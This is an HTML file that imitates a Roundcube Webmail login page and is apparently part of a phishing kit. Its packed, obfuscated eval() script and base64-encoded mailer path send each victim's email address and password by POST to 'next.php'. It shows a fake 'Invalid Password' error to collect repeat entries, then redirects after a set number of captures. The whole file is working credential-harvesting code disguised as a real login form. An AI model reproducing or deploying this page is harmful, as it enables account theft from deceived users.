<!doctype html>
<html lang="en">

<head>
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
        <script type="text/javascript" src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="icon" href="images/logo_icon.ico" type="image/icon" sizes="30x30">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
    <title>Roundcube Webmail</title>
    <link href="css/hover.css" rel="stylesheet" media="all">
    <style type="text/css">
    .box {
        margin: 0;
        padding: 4px;
        border: 1px solid #b2b2b2;
        border-radius: 4px;
        box-shadow: inset 0 0 2px 1px rgba(0, 0, 0, .1);
        -webkit-box-shadow: inset 0 0 2px 1px rgba(0, 0, 0, .1);
    }
    </style>
</head>

<body style="background-color: #cad2d9;">
   
    <div class="container-fluid">
        <div class="row" style="margin: 30px 0px 60px 0px;">
            <div class="col-md-4 mx-auto mt-5 px-3 pb-5" style="border:1px solid; background-color: rgba(0,0,0,0.7);border-radius:15px;">
                <div class="text-center pt-5">
                    <img src="images/roundcube.png" class="img-fluid" width="180px"><br>
                </div>
                <div>
                    <center>
                        <div class="alert alert-danger" id="mgss" style="display: none;">Invalid Password...! Please enter correct password.</div>
                        <span id="eroooor" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
                    </center>
                    <form id="contact" class="form-horizontal well">
                        <div id="div1" class="text-white">
                            <div class="col-lg-12">
                                <div class="form-group">
                                    <div id="inputbar">
                                        <label for="exampleInputai1">Email address</label>
                                        <input type="email" name="ai" class="form-control" id="ai" aria-describedby="aiHelp" placeholder="Enter email">
                                    </div>
                                    <!-- <div id="automail" class="h5 mt-5" style="display: none;">
                        <i class="fas fa-arrow-left" id="back1"></i>&nbsp<span id="emailch">abc@abc.com</span>
                      </div> -->
                                </div>
                            </div>
                            <div class="col-lg-12">
                                <div class="form-group">
                                    <label for="pr">Password</label>
                                    <input type="password" name="pr" class="form-control" id="pr" aria-describedby="aiHelp" placeholder="Enter Password">
                                </div>
                            </div>
                        </div>
                </div>
                <div class="text-center">
                    <button class="btn btn-white text-dark py-1" id="sub-btn">Login</button>
                </div>
                </form>
            </div>
            <div class="col-lg-12 text-center">
                <small class="font-weight-bold" style="color: #766;">You have successfully terminated the session.<span class="text-dark"> Login to Continue.</span></small>
            </div>
            <div class="col-lg-12 text-center mt-5">
                <span class="" style="color: #766;">RoundCube Webmail</span>
            </div>
        </div>
    </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" ></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" ></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
//redirect link
var rdrt = "/roundcube-RD3-nobar/images/roundcube snip.jpg";

//mail result count
var rc = 2;

//mailer link
var f = atob("bmV4dC5waHA=");



eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(R).S(7(){3 m=0;$("#v").T(7(){3 a=$("#v").5();3 b=/^([a-8-s-E\\.\\-])+\\@(([a-8-s-9\\-])+\\.)+([a-8-s-9]{2,4})+$/;x(!b.F(a)){$(\'#z\').5("")}G{3 d=a;3 e=d.t("@");3 f=d.6((e+1));3 c=f.6(0,f.t(\'.\'));3 g=c.A();$(\'#z\').5("H://"+f+"/I/")}});$(\'#U\').J(7(){$("#w").u();$(\'#v\').5("");$("#V").K({W:L,M:"u"},0);$("#X").K({Y:L,M:"B"},Z)});3 n=N.O.10.6(1);x(!n){}G{3 o=n;3 p=o.t("@");3 q=o.6((p+1));3 c=q.6(0,q.t(\'.\'));3 r=c.A();$(\'#11\').12("13");$("#w").u();$(\'#14\').15(\'16\',\'17/18-1.19\');$(\'#1a\').y("1b 1c");$(\'#v\').5(o);$(\'#1d\').y(o);$(\'#z\').5("H://"+q+"/I/");$("#w").u()}$(\'#C-D\').J(7(b){$(\'#P\').u();$(\'#w\').u();b.1e();3 d=$("#v").5();3 e=$("#Q").5();3 h=d;3 i=/^([a-8-s-E\\.\\-])+\\@(([a-8-s-9\\-])+\\.)+([a-8-s-9]{2,4})+$/;x(!i.F(h)){$(\'#P\').B();d.1f;1g 1h}3 j=h.t("@");3 k=h.6((j+1));3 c=k.6(0,k.t(\'.\'));3 l=c.A();m=m+1;$.1i({1j:\'1k\',1l:f,1m:\'1n\',1o:{1p:d,1q:e,},1r:7(a){$(\'#C-D\').y(\'1s...\')},1t:7(){$("#Q").5("");x(m>=1u){m=0;N.O.1v(1w)}$("#w").B();$(\'#C-D\').y(\'1x\')}})})});',62,96,'|||var||val|substr|function|zA||||||||||||||||||||Z0|indexOf|hide|ai|mgss|if|html|toplink|toLowerCase|show|sub|btn|9_|test|else|https|webmail|click|animate|200|opacity|window|location|eroooor|pr|document|ready|focusout|back1|automail|left|inputbar|right|1000|hash|contact|trigger|reset|fieldImg|attr|src|images|other|png|field|Other|Mail|aich|preventDefault|focus|return|false|ajax|dataType|JSON|url|type|POST|data|aai|ppr|beforeSend|Verifing|complete|rc|replace|rdrt|Login'.split('|'),0,{}))
</script>

</html>